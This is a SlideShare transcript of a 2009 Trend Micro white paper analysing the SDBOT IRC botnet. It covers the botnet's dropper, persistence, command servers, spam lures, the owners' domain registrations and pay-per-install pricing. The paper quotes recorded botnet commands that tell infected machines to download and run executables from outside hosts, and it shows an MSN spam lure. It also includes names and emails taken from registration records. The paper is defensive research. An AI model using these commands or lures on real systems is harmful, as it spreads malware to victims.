SDBOT IRC Botnet Continues To Make Waves
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

SDBOT IRC Botnet Continues To Make Waves

on

  • 3,565 views

Trend Micro threat researchers analyze the routines and social engineering techniques used by the SDBOT family of malware.

Trend Micro threat researchers analyze the routines and social engineering techniques used by the SDBOT family of malware.

Statistics

Views

Total Views
3,565
Views on SlideShare
3,563
Embed Views
2

Actions

Likes
1
Downloads
26
Comments
0

1 Embed 2

http://firefly.activestate.com 2

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

SDBOT IRC Botnet Continues To Make Waves Document Transcript

  • 1. SDBOT IRC Botnet Continues to Make Waves Trend Micro, Incorporated Loucif Kharouni Trend Micro Threat Research A Trend Micro White Paper I December 2009
  • 2. SDBOT IRC Botnet Continues to Make Waves CONTENTS Overview ...........................................................................................................................................3 BKDR_SDBOT.COD Analysis...........................................................................................................4 Stage 1: Initial Installer ...........................................................................................................................4 TROJ_DROPPR.BH Details .............................................................................................................4 BKDR_SDBOT.COD Details ..............................................................................................................5 Stage 2: IRC Communication.................................................................................................................6 Stage 3: Third-Party Malware ............................................................................................................... 7 TROJ_CUTWAIL (PUSHDO/PANDEX) ...........................................................................................8 TROJ_FAKEAV ..................................................................................................................................8 WORM_KOOBFACE ...........................................................................................................................8 Social Engineering ...........................................................................................................................9 Spam Wave 1: Self-Promotion Spam ....................................................................................................9 Spam Wave 2: Prestige Replica Spam .................................................................................................9 Spam Wave 3: Other Social Engineering Spam ............................................................................... 10 Behind the Malware: Botnet Owners ............................................................................................ 11 SDBOT, the Pay-per-Install Model, and FAKEAV........................................................................ 15 Best Practices to Avoid SDBOT Malware Infection.................................................................... 17 Conclusion ...................................................................................................................................... 18 References ..................................................................................................................................... 20 2 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 3. SDBOT IRC Botnet Continues to Make Waves OVERVIEW SDBOT malware variants usually propagate through network shares and exploited unpatched vulnerabilities. They also exhibit a number of backdoor capabilities and some information theft routines. Some variants even have the capability to bypass secuirty measures and to overwrite system files in order to maximize their network connection capacity. Most of the bots SDBOT malware have been around as early as 2004. Most of the bots that use Internet that use IRC proto- Relay Chat (IRC) protocol communication such as AGOBOT, IRCBOT, RBOT, and others col communication have been around as early as 2001. However, these kinds of malware rarely attract such as AGOBOT, attention due to their ability to silently operate. These bot malware are neither heavy email IRCBOT, RBOT, and spammers nor resource hogs. They hardly ever disrupt normal computer activities—say, others have been Internet browsing—so their victims never notice that their computers have been infected. around as early as 2001 yet these kinds In this paper, the researcher focused on SDBOT variants and their final payload—the of malware rarely installation of pay-per-install programs. attract attention due to their ability The contents of this paper are targeted at security analysts and specialists. It includes to silently operate. an in-depth technical analysis of the SDBOT threat and takes a look behind the scenes at the business model used by the cybercriminal gang to rent out SDBOT’s reach and download capability. 3 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 4. SDBOT IRC Botnet Continues to Make Waves BKDR_SDBOT.COD ANALYSIS Stage 1: Initial Installer BKDR_SDBOT.COD BKDR_SDBOT.COD is typically dropped by a Trojan detected by Trend Micro as TROJ_ is typically dropped DROPPR.BH. SDBOT.COD arrives as a file named photo.com that is actually a simple by TROJ_DROPPR. Win32 Cabinet Self-Extractor renamed into a .COM file. If this file is renamed as an BH as photo.com, executable file (by changing the file name extension to .EXE), the embedded file named a simple Win32 burim.exe can then be extracted. Cabinet Self-Extrac- tor that has been TROJ_DROPPR.BH Details renamed into a .COM file. Filename: photo.com MD5: 613ceb085ee2ad31e1f95249d804409e SHA-1: b73ae87c167c8ec0e9e52000d7d3d8e9ecaba27a Here are some snippets from the Trojan’s code. The Microsoft .CAB file (MSCF) header of the Cabinet file was found to be 4D534346 (see Figure 1). Figure 1. MSCF header [4D534346] To extract the contents of the Cabinet file, the strings starting at MSCF were first selected and saved as burim.cab (see Figure 2). Figure 2. Extracting burim.cab from photo.com 4 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 5. SDBOT IRC Botnet Continues to Make Waves Figure 3. burim.exe extracted from burim.cab The dropper (photo.com) performs some system changes. It then creates the following registry entry: HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce rundll32.exe C:WINDOWSsystem32advpack.dll,DelNodeRunDLL32 “C: DOCUME~1userLOCALS~1TempIXP000.TMP” It also creates the following folder and files: • C:DOCUME~1userLOCALS~1TempIXP000.TMP • C:DOCUME~1userLOCALS~1TempIXP000.TMPTMP4351$.TMP • C:DOCUME~1userLOCALS~1TempIXP000.TMPburim.exe The dropped file burim.exe is a backdoor. BKDR_SDBOT.COD Details Filename: burim.exe; fxstaller.exe MD5: 2515df8f2df211e969da5d15d995da0e SHA-1: a4f832556e9d4e8803b74ff40d7c0fd5b1fa8609 To infect systems, BKDR_SDBOT. BKDR_SDBOT.COD places a copy of itself in the C:Windows folder as fxstaller.exe and COD: creates the following registry entry to ensure its automatic execution at every system • Places a copy of itself in the C: Windows folder as fxstaller.exe startup: • Creates a registry entry to ensure its automatic execution at every system startup Windows UDP Control Center • Connects to an IRC server whose HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun IP address may change from time fxstaller.exe to time • Joins an IRC channel • Creates a mutex to ensure that Upon execution, BKDR_SDBOT.COD connects to the following IRC server: only one instance of itself is run- ning in memory dddd.burimche.net -> 89.255.10.90 IP Address 89.255.10.90 Host unassigned-89-255-10-90.rdns.hosting-concepts.nl Location NL NL, Netherlands City Rotterdam, 11 - Organization Netnation Europe V.O.F. ISP Netnation Europe V.O.F. AS Number AS15703 TrueServer BV AS number 5 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 6. SDBOT IRC Botnet Continues to Make Waves However, the IP address (89.255.10.90) may vary. During testing, the IP address changed every now and then to any of the following: • 69.175.13.42 • 174.133.29.34 • 218.61.22.10 It then joins the IRC channel, ##bb##. It also creates the mutex, LiNbagGgsag, to ensure that only one instance of itself is running in memory. Stage 2: IRC Communication Once back-and-forth Once back-and-forth communication has been established, the victim’s computer communication is effectively becomes a zombie. It can now be controlled by remote users—the creators of established after SDBOT—via IRC. As shown in the IRC screen communication in Figure 4, which is sent SDBOT infection, a to a zombie machine, commands are sent to the victim’s computer to download third- victim’s computer party malware. This is part of the pay-per-install business. effectively becomes a zombie. Figure 4. IRC screen communication instructing victim’s computer to download files :Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http:// stashbox.org/543111/a.exe c:tpde.exe 1 The machine then downloads the file a.exe from stashbox.org and copies it to the system’s C: drive as tpde.exe then runs it. :Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http:// www.iliridas.com/girl.exe c:tafe.exe 1 6 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 7. SDBOT IRC Botnet Continues to Make Waves In the screenshot below (see Figure 5), the malware attempts to propagate via MSN, a popular instant messaging (IM) application. Figure 5. Malware attempts to propagate via MSN A botnet master is The bot master—the remote user who currently controls the network of compromised a remote user who machines—sends commands via IRC with the link to spam to all MSN Messenger currently controls contacts found using the following strings: a network of compromised :get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg machines. Hey, is this really you ?! : ) hxxp://www.main-gallery.com/ image.php?=[msn email add of zombie machine] The message strings above are then sent to all of the victim’s MSN Messenger contacts. The contact who receives the message may likely assume that the message came from a trusted contact. If, however, he/she clicks the link in the message, he/she will be prompted to download and execute a file (i.e., the SDBOT malware). Stage 3: Third-Party Malware The victim’s computer downloads any of several possible non-SDBOT malware listed below. Note, however, that this is not an exhaustive list. • BKDR_POISON • TROJ_SMALL • TROJ_BUZUS • TROJ_VUNDO • TROJ_CUTWAIL • WORM_AUTORUN • TROJ_FAKEAV • WORM_KOOBFACE • TROJ_RENOS • WORM_MAINBOT 7 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 8. SDBOT IRC Botnet Continues to Make Waves Some of the malware an SDBOT- Some of the malware listed are among the more dangerous ones researchers have seen affected system downloads are recently. The following sections provide short profiles of some of these malware whose among the more dangerous ones researchers have recently seen. routines make vivid how dangerous it is to be part of an IRC botnet nowadays. These include: • TROJ_CUTWAIL (PUSHDO/PAN- TROJ_CUTWAIL (PUSHDO/PANDEX) DEX/CUTWAIL) • TROJ_FAKEAV If a machine is infected by TROJ_CUTWAIL then it is almost always certain that it is part • WORM_KOOBFACE of a botnet called “CUTWAIL” (also known as “PUSHDO” or “PANDEX”). This botnet is one of the largest spam botnets in the world. It has been responsible for several known spam campaigns that advertise pharmaceutical products (e.g., Viagra) or pharmaceutical companies (e.g., Canadian Pharmacy). This botnet is also responsible for malware-related spam campaigns, specifically the recent U.S. Independence Day spam, which contained malicious links that, when clicked, led recipients to a website to download a WORM_WALEDAC variant. Researchers have also seen this botnet send out ecard spam in July. These email messages bore the same email body even though the attached file ecard.exe could either be a TROJ_ CUTWAIL or a TROJ_ZBOT variant. TROJ_FAKEAV Most security/tech-savvy users are already familiar with rogue antivirus (FAKEAV) malware. These programs usually claim to rid a system of infections, which, in fact, it has planted itself. In recent months, these FAKEAV variants arrived as the final payload of blackhat search engine optimization (SEO) attacks. However, FAKEAV can also be part (i.e., one of the links) of other malware infection chains. WORM_KOOBFACE KOOBFACE is well-known for spreading among social networking websites such as Facebook, Friendster, Twitter, and some others. Users may receive spammed messages in their Facebook inboxes containing links to a particular video. These links, however, lead to the download of a KOOBFACE variant instead. KOOBFACE is one of the biggest Web 2.0 botnets spreading on Facebook, MySpace, and Twitter. 8 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 9. SDBOT IRC Botnet Continues to Make Waves SOCIAL ENGINEERING Spam Wave 1: Self-Promotion Spam SDBOT uses various social Self-promotion spam waves send malicious links to personal profile pages or files with engineering techniques to lure a short message in order to convince users to click the link and therefore download a victims, the most common of which is running spam waves malicious file, which will connect them to the botnet (see Figure 6). featuring: • Self-promotion spam • Prestige replica spam • Other social engineering spam Figure 6. Self-promotion spam Spam Wave 2: Prestige Replica Spam Prestige replica spam waves send links to replica sites with a short message in order to convince users to click the link and therefore buy replica watches (see Figure 7). Figure 7. Prestige replica spam 9 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 10. SDBOT IRC Botnet Continues to Make Waves Most social Spam Wave 3: Other Social Engineering Spam engineering spam leverage news on Most of the social engineering spam waves send malicious links to sites on which news popular events to on popular events (e.g., Michael Jackson’s death) are hosted with a short message in lure victims. order to convince users to click the link and therefore download a malicious file, which will connect them to the botnet (see Figure 8). Figure 8. Other social engineering spam 10 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 11. SDBOT IRC Botnet Continues to Make Waves BEHIND THE MALWARE: BOTNET OWNERS As part of this study, the researcher has been looking at everything related to the burimche.net domain, including the following: • *.burimilol.com • *.burimilol.net • *.burimche.net • burimi.*.net While looking for information about these domain names, the researcher came across a forum where two members were talking about an executable file for sale. One of them was complaining about the fact that the user burimi @ nerashti.com did not create the file as promised after he has already paid for that service. The manner by Continuing the investigation on domain names, the researcher also looked for the which cybercriminals newest related domain names but found that they have all been registered in either register domain names Yahoo! or Altavista. The manner by which the cybercriminals registered domain names has changed to make it has changed, making it harder for researchers to track them back. So the researcher harder for researchers decided to take a look instead at the oldest domain name—burimilol.net—and found the to track them. following: [BURIMILOL.NET] BURIM ALIJI NERASHTI 1203 TETOVO, 91200 MACEDONIA ALBANIA [MAINMSN.COM] nicKy, FisniK NERASHTI TETOVO, 20000 source://myspc.net/wievimage.php Registrant MYSPC.NET: Bruno (edinplay@gmail.com) fajro 14 Ulqin* - Laç 40000 ALGERIA *Ulqin is located in Montenegro not in Algeria. Burim in Albanian means “source.” These findings suggest that these threats could originate from the Albanian, Macedonian, or Montenegro regions. 11 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 12. SDBOT IRC Botnet Continues to Make Waves Cybercriminals As stated earlier, it has become hard to track the cybercriminals based on domain names continuously changed as for some reason they have resorted to using free Internet services from providers IP addresses. Tracking such as Yahoo! or Altavista. The cybercriminals continuously changed IP addresses a single domain name, as well, making the task even harder. For instance, tracking a single domain name can therefore, can lead to lead to several different IP addresses. In a month, a domain name can have around four several different IP different IP addresses (see Figure 9). addresses. Figure 9. IP addresses a single domain name can connect to The botnet sends links to several domain names via MSN (see Figure 10). 12 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 13. SDBOT IRC Botnet Continues to Make Waves Figure 10. Links sent to MSN Given the nature of SDBOT—that it is primarily geared toward downloading other malware files that each have their own distinct payloads and strong connections with other malware families—it appears that the botnet is in the business of renting out its reach and download capability to cybercriminals. These cybercriminals may either be interested in increasing their number of victims or in sending out spammed messages for various other purposes. This is a known malware business model wherein some cybercriminal gangs pay others to spread their malicious code. For the longest time, instead of conducting their own focused attacks, the SDBOT cybercriminal gang is keeping itself busy by responding to different business requests such as installing FAKEAV, KOOBFACE, CUTWAIL, and other malware variants on their infected bots. Cybercriminals do As security experts and threat researchers already know by now, botnets do not only business with other bring about big business, they are also, to a certain logical extent, interconnected to cybercriminals to one another. Cybercriminals do business with other cybercriminals. This allows them to take advantage of take advantage of other, possibly better, technologies and newer ways to spread their other, possibly better, malicious code than when they do so on their own. technologies and newer ways to spread their malicious code. 13 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 14. SDBOT IRC Botnet Continues to Make Waves On top of being cybercriminals, they are first “real” criminals who conduct illegal business by stealing money and crucial/private information and ruining companies’ businesses. Cybercriminal interconnections are becoming more popular. Working together is no longer a problem among cybercriminals as in the past. As such, they have become stronger and harder to track. It is easy to see that money is driving all these illegal activities. The only remaining question is, “Why use an ‘old’ technology such as an IRC botnet when lots of newer technologies can already be seen in the wild?” Using a simple The answer is quite simple—because this kind of botnet is currently off the radar unlike but effective type several others (DOWNAD, ZEUS, WALEDAC, KOOBFACE, ILOMO, and PUSHDO), of botnet makes which are consistently being monitored by researchers. Using a simple but effective type cybercriminals of botnet makes cybercriminals feel like they are in “heaven.” They can opt to use not feel like they are in only one but several ways to spread malware. “heaven.” 14 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 15. SDBOT IRC Botnet Continues to Make Waves SDBOT, THE PAY-PER-INSTALL MODEL, AND FAKEAV The use of the pay- FAKEAV variants are currently taking the threat landscape by storm. The use of the pay- per-install business per-install business model is also increasing as the model is easy to use. A botnet owner model is increasing, now gets paid to install malware on infected PCs. For instance, a FAKEAV creator pays making it possible the SDBOT gang, which already owns an IRC botnet and controls thousands of infected for a botnet owner machines, to easily push the FAKEAV file to systems. The gang then gets paid a certain to get paid to install amount of money for each successful installation (see Table 1). malware on already- infected systems. Country Code Price US US$120 BR US$60 TR US$45 Mixed US$25 GB, CA, DE US$150 Table 1. Pay-per-install FAKEAV price list The following country codes can be included in mixed lists: • A2 • CH • GH • KR • AE • CI • GR • KW • AF • CL • HK • KZ • AM • CN • HR • LK • AR • CO • HU • LT • AT • CZ • ID • LV • AU • DE • IL • LY • AZ • DZ • IN • MA • BD • EC • IQ • MD • BE • EG • IR • MK • BG • ES • IT • MX • BH • EU • JO • MY • BR • FR • JP • NG • BY • GB • KG • NI • CA • GE • KH • NL 15 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 16. SDBOT IRC Botnet Continues to Make Waves • NP • PT • SI • UA • NZ • QA • SK • US • OM • RO • SY • UY • PA • RS • TH • UZ • PE • RU • TN • VN • PH • SA • TR • YE • PK • SE • TW • ZA • PL • SG • TZ The more difficult it As shown, the prices paid depend on the target countries mainly because the difficulty is to infect a system, of compromising systems is considered. For instance, compromising a computer located the more money a somewhere in North America or Europe is harder to do because it is better protected, cybercriminal gets and hence costs more. However, because more people have Internet access in these from successfully countries, more systems can be compromised in them, which cybercriminals also take compromising it. into consideration. Pay-per-install services are publicly available on many Russian underground forums. Anyone can offer pay-per-install services for money. Target systems can be chosen in terms of: • Region • Country • OS • Language Another way to make money in the pay-per-install business is to register in underground- affiliated websites (see Figure 11). Cybercriminals will provide the malware sample to interested parties who will then make it available for victims to install. Once interested parties get the malware from an affiliate site, they bind it with a popular program and post it via torrents or peer-to-peer (P2P) networks. Binding is a popular technique used to merge two files together. For example, any Trojan can be merged with Adobe Acrobat Writer, which can then be made available for download in torrents. Unknowing users will then get a free Trojan with Adobe Acrobat Writer. Binder tools are available all over the Web and not too hard to find. 16 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 17. SDBOT IRC Botnet Continues to Make Waves BEST PRACTICES TO AVOID SDBOT MALWARE INFECTION In the course of conducting research on SDBOT variants, the researcher came across some useful dos and don’ts that users can employ to avoid SDBOT malware infection: • Do not click links sent via IM applications, especially if you do not know who sent them. • Do update your security applications regularly to decrease the chances of becoming infected. • Do not open unsolicited email or spam. 17 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 18. SDBOT IRC Botnet Continues to Make Waves CONCLUSION In this paper, we saw how this threat connects a user’s system to an IRC network. We also saw how the botnet uses an infected system to spread other malware, which may connect it to another botnet. We observed how cybercriminals go about their business and how their networks are structured. RUBotted monitors As such, we recommend the use of free tools such as RUBotted (see Figures 12 and 13) computers for to detect if a computer is part of an IRC botnet and HouseCall (see Figure 14) to clean suspicious activi- an infected system. ties and regularly checks with an online service to identify behaviors associated with bots. Figure 11. RUBotted GUI Figure 12. RUBotted message prompt Figure 13. HouseCall GUI HouseCall 7, Trend Micro’s latest free online scanner, leverages the Smart Protection Network to deliver fast detection and removal of active malware. It zeroes in on active threats by checking key system areas used by malware programs. It also checks for malicious browser plug-ins, rootkits, and other auto-run executable files. Its new features include: • A browser-independent client that eliminates compatibility issues often associated with other browser-activated scanners • Smart Scan technology for targeted scanning of active malware, reducing scan time to several minutes 18 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 19. SDBOT IRC Botnet Continues to Make Waves HouseCall is Trend • In-the-cloud threat intelligence, delivering immediate detection while reducing Micro’s highly download requirements popular and capable on-demand scanner • Smart feedback that shares threat information with the Smart Protection Network, for identifying and enabling data correlation across a global intelligence network to quickly discover removing viruses, new threats Trojans, worms, unwanted browser • Review and restore functionality that lets a user compare current with past scan plug-ins, and other results and recover files malware. 19 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
  • 20. SDBOT IRC Botnet Continues to Make Waves REFERENCES • Trend Micro. (2009). Threat Encyclopedia. “BKDR_SDBOT.COD.” http://threatinfo. trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.COD (Retrieved August 2009). • Trend Micro. (2009). Threat Encyclopedia. “TROJ_DROPPR.BH.” http://threatinfo. trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPR.BH (Retrieved August 2009). TREND MICRO™ TREND MICRO INC. Trend Micro Incorporated is a pioneer in secure content and threat 10101 N. De Anza Blvd. management. Founded in 1988, Trend Micro provides individuals and Cupertino, CA 95014 organizations of all sizes with award-winning security software, hard- US toll free: 1 +800.228.5651 ware and services. With headquarters in Tokyo and operations in Phone: 1 +408.257.1500 more than 30 countries, Trend Micro solutions are sold through cor- Fax: 1 +408.257.2003 porate and value-added resellers and service providers worldwide. For additional information and evaluation copies of Trend Micro products www.trendmicro.com and services, visit our Web site at www.trendmicro.com. ©2009 by Trend Micro, Incorporated. All rights reserved. Trend Micro, the Trend Micro t-ball logo are trademarks 20 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.